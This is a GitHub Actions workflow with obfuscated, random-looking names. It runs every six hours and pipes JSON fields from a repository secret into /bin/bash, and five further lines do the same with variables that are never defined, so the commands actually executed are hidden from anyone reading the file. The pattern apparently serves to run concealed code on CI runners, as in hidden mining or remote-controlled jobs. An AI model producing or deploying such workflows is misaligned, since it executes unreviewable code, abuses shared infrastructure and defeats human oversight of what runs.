name: jogdefeated

on:
  workflow_dispatch:
  schedule:
    - cron: '8 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: jogdefeated
        env:
          cx2346: ${{ secrets.cx2346 }}
        run: |
          echo $cx2346 | jq -r .bc5 | /bin/bash
          echo $tting02827 | jq -r .ircqr63 | /bin/bash
          echo $rp5 | jq -r .jaft958 | /bin/bash
          echo $ckoqb1 | jq -r .smi28 | /bin/bash
          echo $cssym16689 | jq -r .jwfe77737 | /bin/bash
          echo $ybwf900 | jq -r .vx50765 | /bin/bash

